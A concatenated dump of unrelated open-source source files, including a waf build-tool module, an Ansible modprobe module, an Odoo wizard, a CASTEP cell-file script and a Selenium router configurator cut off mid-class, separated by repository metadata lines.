plt.savefig(directoryfigure + 'sstq_00%s.png' % (i),
dpi=200)
elif i < 100:
plt.savefig(directoryfigure + 'sstq_0%s.png' % (i),
dpi=200)
else:
plt.savefig(directoryfigure + 'sstq_%s.png' % (i),
dpi=200)
### Remove text for each figure
t.remove()
t1.remove()
t2.remove()
t3.remove()
t4.remove() | mit | -3,789,496,145,167,507,000 | 31.4875 | 89 | 0.550317 | false |
Chiru/NVE_Simulation | NS3/waf-tools/misc.py | 69 | 11666 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
def subst_func(tsk):
"Substitutes variables in a .in file"
m4_re = re.compile('@(\w+)@', re.M)
code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
self.dep_vars = [] # additional environment variables to look
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
| bsd-3-clause | 1,843,422,790,667,014,000 | 27.246973 | 116 | 0.686611 | false |
CompassionCH/compassion-modules | gift_compassion/wizards/collect_gifts_wizard.py | 4 | 1439 | ๏ปฟ# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models
from odoo.tools import safe_eval
class CollectGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'gift.collect.wizard'
invoice_line_ids = fields.Many2many(
'account.invoice.line', string='Invoice lines',
)
domain = fields.Char(
default="[('product_id.name', '=', 'Child gift'),"
" ('state', '=', 'paid'),"
" ('gift_id', '=', False)]"
)
@api.onchange('domain')
def apply_domain(self):
return {
'domain': {'invoice_line_ids': safe_eval(self.domain)}
}
@api.multi
def collect_invoices(self):
# Read data in english
self.ensure_one()
gift = self.env['sponsorship.gift'].browse(
self.env.context['active_id'])
self.invoice_line_ids.write({'gift_id': gift.id})
return gift.write({
'invoice_line_ids': [(4, id) for id in self.invoice_line_ids.ids]
})
| agpl-3.0 | 3,357,152,643,305,090,600 | 31.659091 | 78 | 0.517745 | false |
CydarLtd/ansible | lib/ansible/modules/system/modprobe.py | 69 | 3813 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, David Stygstra <[email protected]>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: modprobe
short_description: Add or remove kernel modules
requirements: []
version_added: 1.4
author:
- "David Stygstra (@stygstra)"
- "Julien Dauphant"
- "Matt Jeffery"
description:
- Add or remove kernel modules.
options:
name:
required: true
description:
- Name of kernel module to manage.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the module should be present or absent.
params:
required: false
default: ""
version_added: "1.6"
description:
- Modules parameters.
'''
EXAMPLES = '''
# Add the 802.1q module
- modprobe:
name: 8021q
state: present
# Add the dummy module
- modprobe:
name: dummy
state: present
params: 'numdummies=2'
'''
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
import shlex
def main():
module = AnsibleModule(
argument_spec={
'name': {'required': True},
'state': {'default': 'present', 'choices': ['present', 'absent']},
'params': {'default': ''},
},
supports_check_mode=True,
)
args = {
'changed': False,
'failed': False,
'name': module.params['name'],
'state': module.params['state'],
'params': module.params['params'],
}
# Check if module is present
try:
modules = open('/proc/modules')
present = False
module_name = args['name'].replace('-', '_') + ' '
for line in modules:
if line.startswith(module_name):
present = True
break
modules.close()
except IOError:
e = get_exception()
module.fail_json(msg=str(e), **args)
# Check only; don't modify
if module.check_mode:
if args['state'] == 'present' and not present:
changed = True
elif args['state'] == 'absent' and present:
changed = True
else:
changed = False
module.exit_json(changed=changed)
# Add/remove module as needed
if args['state'] == 'present':
if not present:
command = [module.get_bin_path('modprobe', True), args['name']]
command.extend(shlex.split(args['params']))
rc, _, err = module.run_command(command)
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
elif args['state'] == 'absent':
if present:
rc, _, err = module.run_command([module.get_bin_path('modprobe', True), '-r', args['name']])
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
module.exit_json(**args)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,061,765,552,863,909,000 | 27.036765 | 104 | 0.578809 | false |
CyrilPeponnet/Archipel | ArchipelAgent/archipel-agent-action-scheduler/archipelagentactionscheduler/__init__.py | 5 | 2236 | # -*- coding: utf-8 -*-
#
# __init__.py
#
# Copyright (C) 2010 Antoine Mercadal <[email protected]>
# Copyright, 2011 - Franck Villaume <[email protected]>
# This file is part of ArchipelProject
# http://archipelproject.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import actionscheduler
def make_archipel_plugin(configuration, entity, group):
"""
This function is the plugin factory. It will be called by the object you want
to be plugged in. It must return a list whit at least on dictionary containing
a key for the the plugin informations, and a key for the plugin object.
@type configuration: Config Object
@param configuration: the general configuration object
@type entity: L{TNArchipelEntity}
@param entity: the entity that has load the plugin
@type group: string
@param group: the entry point group name in which the plugin has been loaded
@rtype: array
@return: array of dictionary containing the plugins informations and objects
"""
return [{"info": actionscheduler.TNActionScheduler.plugin_info(),
"plugin": actionscheduler.TNActionScheduler(configuration, entity, group)}]
def version():
"""
This function can be called runarchipel -v in order to get the version of the
installed plugin. You only should have to change the egg name.
@rtype: tupple
@return: tupple containing the package name and the version
"""
import pkg_resources
return (__name__, pkg_resources.get_distribution("archipel-agent-action-scheduler").version, [actionscheduler.TNActionScheduler.plugin_info()]) | agpl-3.0 | 8,855,939,689,701,253,000 | 42.862745 | 147 | 0.738819 | false |
yglazko/bedrock | bedrock/facebookapps/utils.py | 21 | 3549 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import urllib
from base64 import urlsafe_b64decode
from django.conf import settings
from django.utils.translation import get_language
import commonware.log
import tower
from lib import l10n_utils
log = commonware.log.getLogger('facebookapps.utils')
def unwrap_signed_request(request):
"""
Decodes and returns Facebook's `signed_request` data.
See https://developers.facebook.com/docs/howtos/login/signed-request/
"""
try:
encoded_signed_request = request.REQUEST['signed_request']
except KeyError:
return {}
encoded_string_data = encoded_signed_request.partition('.')[2]
# Pad with `=` to make string length a multiple of 4
# and thus prevent a base64 error
padding = ''.ljust(4 - len(encoded_string_data) % 4, '=')
padded_string = ''.join([encoded_string_data, padding])
# Convert to byte data for base64
encoded_byte_data = bytes(padded_string)
signed_request = json.loads(urlsafe_b64decode(encoded_byte_data))
# Change Facebook locale's underscore to hyphen
# ex. `en_US` to `en-US`
try:
locale = signed_request['user']['locale']
except KeyError:
locale = None
if locale:
signed_request['user']['locale'] = locale.replace('_', '-')
return signed_request
def app_data_query_string_encode(app_data):
return urllib.urlencode([('app_data[{key}]'.format(key=key), value)
for key, value in app_data.items()])
def get_best_locale(locale):
"""
Returns the most appropriate locale from the list of supported locales.
This can either be the locale itself (if it's supported), the main locale
for that language if any or failing any of that the default `en-US`.
Adapted from `activate_locale` in Affiliates (http://bit.ly/17if6nh).
"""
# Compare using lowercase locales since they become lowercase once
# activated.
supported_locales = [loc.lower() for loc in settings.FACEBOOK_LOCALES]
# HACK: It's not totally clear to me where Django or tower do the matching
# that equates locales like es-LA to es, and I'm scared enough of getting
# it wrong to want to avoid it for the first release. So instead, we'll
# activate the requested locale, and then check what locale got chosen by
# django as the usable locale, and match that against our locale
# whitelist.
# TODO: Properly filter out locales prior to calling activate.
old_locale = get_language()
tower.activate(locale)
lang = get_language()
if lang.lower() not in supported_locales:
# Try to activate just the language and use the resulting locale
lang_prefix = lang.split('-')[0]
tower.activate(lang_prefix)
lang = get_language()
if lang.lower() not in supported_locales:
# Finally, try to find a locale with that language in the supported
# locales. Otherwise, use default en-US.
try:
lang = next(locale for locale in settings.FACEBOOK_LOCALES
if locale.startswith(lang_prefix))
except StopIteration:
lang = 'en-US'
tower.activate(old_locale)
return lang
def js_redirect(redirect_url, request):
return l10n_utils.render(request, 'facebookapps/js-redirect.html',
{'redirect_url': redirect_url})
| mpl-2.0 | -8,010,045,056,058,590,000 | 33.794118 | 79 | 0.673429 | false |
kaneod/physics | python/castep_special_atom.py | 2 | 11802 | #!/usr/bin/env python
################################################################################
#
# castep_special_atom.py
#
# Version 2.0
#
# Usage castep_special_atom.py SEED Z n
#
# Takes a .cell file SEED.cell, reads it in, changes the "nth" atom of type Z
# to Zspec, writes the file to SEED_special.cell with otherwise no changes.
#
# Designed for calculations where you have to repeat a calculation over all atoms
# of type Z with minor modifications to the pseudopotential for one special atom.
#
################################################################################
#
# Copyright 2013 Kane O'Donnell
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
#
# NOTES
#
# 1. WHY DID I NOT USE ESC_LIB? Because esc_lib.py has scipy dependencies that
# make it hard to get running on a cluster where the default python is from the
# dark ages and installing scipy is a pain anyway.
#
# 2. WHY DID I NOT JUST USE THE SAME DAMN ALGORITHMS AS ESC_LIB? Because it's
# a couple of years later and I have better ways of doing things now.
#
# 3. I did reuse SOME bits of esc_lib, ok? :o)
#
################################################################################
# This will fail on old python versions but is fine for 2.6 and 2.7
from __future__ import division
import argparse
# Debugging flag - set to 1 to see debug messages.
DEBUG=1
# SPECIAL text - what do you want added after the atomic Z to show it as special?
SPECIAL=":exc"
# Element dictionary - note that element 0 is given the UKN moniker.
elements = { 1 : "H", 2 : "He", 3 : "Li", 4 : "Be", 5 : "B", 6 : "C", 7 : "N", \
8 : "O", 9 : "F", 10 : "Ne", 11 : "Na", 12 : "Mg", 13 : "Al", 14 : "Si", \
15 : "P", 16 : "S", 17 : "Cl", 18 : "Ar", 19 : "K", 20 : "Ca", 21 : "Sc", \
22 : "Ti", 23 : "V", 24 : "Cr", 25 : "Mn", 26 : "Fe", 27 : "Co", 28 : "Ni", \
29 : "Cu", 30 : "Zn", 31 : "Ga", 32 : "Ge", 33 : "As", 34 : "Se", \
35 : "Br", 36 : "Kr", 37 : "Rb", 38 : "Sr", 39 : "Y", 40 : "Zr", 41 : "Nb", \
42 : "Mo", 43 : "Tc", 44 : "Ru", 45 : "Rh", 46 : "Pd", 47 : "Ag", \
48 : "Cd", 49 : "In", 50 : "Sn", 51 : "Sb", 52 : "Te", 53 : "I", 54 : "Xe", \
55 : "Cs", 56 : "Ba", 57 : "La", 58 : "Ce", 59 : "Pr", 60 : "Nd", \
61 : "Pm", 62 : "Sm", 63 : "Eu", 64 : "Gd", 65 : "Tb", 66 : "Dy", \
67 : "Ho", 68 : "Er", 69 : "Tm", 70 : "Yb", 71 : "Lu", \
72 : "Hf", 73 : "Ta", 74 : "W", 75 : "Re", 76 : "Os", 77 : "Ir", 78 : "Pt", \
79 : "Au", 80 : "Hg", 81 : "Tl", 82 : "Pb", 83 : "Bi", 84 : "Po", \
85 : "At", 86 : "Rn", 87 : "Fr", 88 : "Ra", 89 : "Ac", 90 : "Th", \
91 : "Pa", 92 : "U", 93 : "Np", 94 : "Pu", 95 : "Am", 96 : "Cm", 97 : "Bk", \
98 : "Cf", 99 : "Es", 100 : "Fm", 101 : "Md", 102 : "No", 103 : "Lr", \
104 : "Rf", 105 : "Db", 106 : "Sg", 107 : "Bh", 108 : "Hs", 109 : "Ds", \
110 : "Ds", 111 : "Rg", 112 : "Uub", 113 : "Uut", 114 : "Uuq", 115 : "Uup", \
116 : "Uuh", 117 : "Uus", 118 : "Uuo", 0 : "UKN"}
def getElementZ(elstr):
""" Z = getElementZ(elstr)
Given a string that contains either a Z number OR an element
abbreviation like Cu, MG, whatever, generates and returns the
appropriate integer Z.
"""
# Is it an integer?
try:
Z = int(elstr)
return Z
except ValueError:
# Not an integer.
if elstr.title() not in elements.values():
print "(libesc.getElementZ) Warning: Element %s is not in the elements dictionary. Returning 0 for element Z." % elstr
return 0
else:
for key, value in elements.items():
if elstr.title() == value:
return key
def remove_comments(lines, comment_delim="#",just_blanks=False):
""" stripped = remove_comments(lines, comment_delim="#", just_blanks=False)
Takes a sequence of lines (presumably from a data file)
and strips all comments, including ones at the end of
lines that are otherwise not comments. Note that we can
only deal with one kind of comment at a time - just apply
multiple times to strip multiple comment types.
Note that we also remove *blank* lines in here, just in
case we're going to do line-by-line processing subsequently
rather than join/splitting (eg. like for XSF files).
If just_blanks is specified, we only eliminate the blanks.
"""
stripped = []
for line in lines:
if just_blanks:
if line.strip() != "":
stripped.append(line.strip())
else:
if not (line.strip().startswith(comment_delim) or line.strip() == ""):
stripped.append(line.partition(comment_delim)[0].strip())
return stripped
def uniqify(sequence, trans=None):
""" unique = uniqify(sequence, trans)
Produces an order-preserved list of unique elements in the passed
sequence. Supports a transform function so that passed elements
can be transformed before comparison if necessary.
"""
if trans is None:
def trans(x): return x
seen = {}
unique = []
for item in sequence:
marker = trans(item)
if marker in seen: continue
seen[marker] = 1
unique.append(item)
return unique
def identify_block(line):
""" blockstr = identify_block(line)
Identifies the actual block title of a castep block like "%block positions_frac".
Can happily cope with comments after the block and all the usual perturbations
such as POSITIONS_FRAC, positionsFrac, positions frac, etc.
"""
# Our working string is wstr. First remove any comments
wstr = line.split("!")[0]
# Remove the actual block
wstr = wstr.split()[1:]
# Combine everything that remains, then split by _ and rejoin.
wstr = "".join(wstr)
wstr = wstr.split("_")
wstr = "".join(wstr)
# Convert to lowercase and return
return wstr.lower()
def parse_cell(lines):
""" positions, species, properties = parse_cell(lines)
Reads a .cell file and returns the positions, the species and a properties
dictionary that contains whether positions_frac or positions_abs was used,
the extra functional lines from the file and anything else useful.
Note we remove all comments.
"""
# Strip all the blank lines and comments.
lines = remove_comments(lines, "!")
# We don't use the for loop here because we may want to sub-loop over blocks.
i = 0
species = []
positions = []
extralines = []
properties = {}
while i < len(lines):
cline = lines[i]
if cline.split()[0].lower() == "%block":
btitle = identify_block(cline)
if DEBUG:
print "Found a block", btitle
if btitle == "positionsfrac" or btitle == "positionsabs":
if btitle == "positionsfrac":
properties["fractional"] = True
else:
properties["fractional"] = False
i += 1
cline = lines[i]
# Might be a units line
if len(cline.split()) == 1:
properties["has units"] = True
properties["units"] = cline.split()[0].strip()
i += 1
cline = lines[i]
else:
properties["has units"] = False
while cline.split()[0].lower() != "%endblock":
species.append(getElementZ(cline.split()[0]))
positions.append([float(x) for x in cline.split()[1:4]])
i += 1
cline = lines[i]
else:
# We aren't interested in the other blocks: just add them to the extra lines.
extralines.append(cline)
else:
# If we aren't reading a block and it isn't a line we're interested in, add
# to the extra lines.
extralines.append(cline)
i += 1
properties["extra lines"] = extralines
return positions, species, properties
def write_new_cell(seed, pos, spec, props, special_index):
""" write_new_cell(seed, pos, spec, props, special_index)
Writes the new .cell file to seed+"_special.cell" and with the special atom listed
as "Z:exc" or whatever the custom SPECIAL text is set at the top of the file.
"""
f = open(seed+"_special.cell", 'w')
# Write all the extra lines first
for line in props["extra lines"]:
f.write(line+"\n")
if "%endblock" in line.lower():
f.write("\n")
# Now write the positions block.
f.write("\n")
if props["fractional"] == True:
f.write("%block positions_frac\n")
else:
f.write("%block positions_abs\n")
if props["has units"]:
f.write(props["units"]+"\n")
for i in range(len(pos)):
if i == special_index:
pstr = "%s%s %g %g %g\n" % (elements[spec[i]], SPECIAL, pos[i][0], pos[i][1], pos[i][2])
else:
pstr = "%s %g %g %g\n" % (elements[spec[i]], pos[i][0], pos[i][1], pos[i][2])
f.write(pstr)
if props["fractional"] == True:
f.write("%endblock positions_frac\n")
else:
f.write("%endblock positions_abs\n")
f.close()
def index_of_species_index(species, Z, n):
""" i = index_of_species_index(Z, n)
Returns the absolute index in the species list of the nth species of element Z.
"""
si = -1
for i, s in enumerate(species):
if DEBUG:
print "Testing atom %d, element %d to see if it matches %d." % (i, s, n)
if s == Z:
si += 1
if si == n:
return i
# Didn't find it
return -1
# Main program
if __name__ == '__main__':
print "castep_special_atom version 2.0"
print ""
print "Written by Kane O'Donnell, September 2013"
print ""
# Parse the command line arguments
parser = argparse.ArgumentParser(description="Make a named atom special in a .cell file")
parser.add_argument('SEED', help="Input file is SEED.cell")
parser.add_argument('Z', help="Element (e.g. C or 6) to make special.")
parser.add_argument('n', type=int, help="Make the nth atom of element Z special. 1-based.")
args = parser.parse_args()
# Convert from 1-based n and possibly-string Z to 0-based n and integer Z.
n = args.n - 1
z = getElementZ(args.Z)
# Sanity check on inputs
if n < 0:
print "ERROR: It looks like you've specified a negative number for the atomic index. Try again. Exiting..."
exit(0)
if z == 0:
print "ERROR: You've specified an unknown element - it has to be one of the ones in our universe, not imaginary ones! Try again. Exiting..."
exit(0)
# Read the cell and check for any species "0" - i.e. if we already have special atoms.
f = open(args.SEED+".cell", 'r')
lines = f.readlines()
f.close()
p, s, props = parse_cell(lines)
if 0 in s:
print "ERROR: There are unknown species in this file already - you already have at least one special atom. For safety reasons, cannot continue. Goodbye!"
exit(0)
si = index_of_species_index(s, z, n)
if si == -1:
print "ERROR: Didn't find atom %d of species %s. Exiting..." % (n, args.Z)
exit(0)
write_new_cell(args.SEED, p, s, props, si)
print "Goodbye!"
exit(0) | gpl-3.0 | -1,891,183,241,990,443,000 | 34.023739 | 157 | 0.577529 | false |
ThirdProject/android_external_chromium_org | chrome/test/functional/ap_lab/dlink_ap_configurator.py | 76 | 12111 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import ap_configurator
import selenium.common.exceptions
class DLinkAPConfigurator(ap_configurator.APConfigurator):
"""Derived class to control the DLink DAP-1522."""
def __init__(self, pyauto_instance, admin_interface_url):
super(DLinkAPConfigurator, self).__init__(pyauto_instance)
# Override constants
self.security_disabled = 'Disable Wireless Security (not recommended)'
self.security_wep = 'WEP'
self.security_wpapsk = 'WPA-Personal'
self.security_wpa2psk = 'WPA-Personal'
self.security_wpa8021x = 'WPA-Enterprise'
self.security_wpa28021x = 'WPA2-Enterprise'
self.admin_interface_url = admin_interface_url
def _OpenLandingPage(self):
self.pyauto_instance.NavigateToURL('http://%s/index.php' %
self.admin_interface_url)
page_name = os.path.basename(self.pyauto_instance.GetActiveTabURL().spec())
if page_name == 'login.php' or page_name == 'index.php':
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'//*[@name="login"]'))
except selenium.common.exceptions.TimeoutException, e:
# Maybe we were re-routes to the configuration page
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) ==
'bsc_wizard.php'):
return
logging.exception('WebDriver exception: %s', str(e))
login_button = self._driver.find_element_by_xpath('//*[@name="login"]')
login_button.click()
def _OpenConfigurationPage(self):
self._OpenLandingPage()
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) !=
'bsc_wizard.php'):
self.fail(msg='Taken to an unknown page %s' %
self.pyauto_instance.GetActiveTabURL().spec())
# Else we are being logged in automatically to the landing page
wlan = '//*[@name="wlan_wireless"]'
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(wlan))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
wlan_button = self._driver.find_element_by_xpath(wlan)
wlan_button.click()
# Wait for the main configuration page, look for the radio button
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
def GetRouterName(self):
return 'Router Name: DAP-1522; Class: DLinkAPConfigurator'
def GetRouterShortName(self):
return 'DAP-1522'
def GetNumberOfPages(self):
